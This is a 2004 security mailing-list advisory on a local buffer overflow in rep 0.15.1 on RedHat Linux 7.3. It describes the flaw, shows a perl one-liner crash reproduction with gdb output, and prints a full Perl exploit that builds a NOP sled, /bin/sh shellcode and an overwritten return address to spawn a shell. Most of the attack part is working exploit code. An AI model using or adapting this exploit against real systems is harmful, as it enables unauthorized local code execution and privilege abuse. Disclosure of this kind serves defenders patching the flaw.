[UNIX] Local Buffer Overflow in REP (Long ARG)

Type securityvulns
Reporter Securityvulns
Modified 2004-03-24T00:00:00


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html

Local Buffer Overflow in REP (Long ARG)


rep stands for "Read, Eval, Print", the three main components of any Lisp system. Librep is a dialect of Lisp, designed to be used both as an extension language for applications, and for use as a general programming language. A vulnerability in rep allows a local user to execute arbitrary code.


Vulnerable Systems: * RedHat Linux 7.3 kernel version 2.4.20, prior versions might also be effected * rep version 0.15.1

To exploit the vulnerability, simply input as first ARG a buffer string of 4081 bytes: $ declare -x BADBUFFER=`perl -e '{print "A"x"4081"}'` $ rep $BADBUFFER Segmentation fault $ gdb rep (gdb) r $BADBUFFER Program received signal SIGSEGV, Segmentation fault. 0x4003f3cd in Fexpand_file_name () from /usr/lib/librep.so.9 (gdb) info reg esp esp 0xbf414139 0xbf414139

Exploit Code:

!/usr/bin/perl -w

RedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit

Legal notes :

The BlackAngels staff refuse all responsibilities for an incorrect

or illegal use of this code or for eventual damages to others systems.

For more information:

[ http://www.blackangels.it ] - ( staff[at]blackangels.it )

$len = 4260; $ret = 0xbf414139; $nop = "\x90";

print "\nRedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit"; print "\nVulnerable versions: RedHat Linux 7.3 with 2.4.20"; print "\n============================================================\n";

if (!$ARGV[0]) { print "You must specify an offset [ Default = -1000 ] ...\n\n"; exit(-1); }

my $offset = "$ARGV[0]";

$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89". "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c". "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". "\xff\xff/bin/sh";

print "Trying to execute /bin/sh ...\n";

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { $buffer .= $nop; }

$buffer .= $shellcode;

print("\nAddress: 0x", sprintf('%lx',($ret + $offset)), "\n"); print "\tRet: $ret + Offset: $offset\n\n";

$new_ret = pack('l', ($ret + $offset)); for ($i += length($shellcode); $i < $len; $i += 4) { $buffer .= $new_ret; }

exec("/usr/bin/rep $buffer");


The information has been provided by <mailto:staff@blackangels.it> BlackAngels Staff.


This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.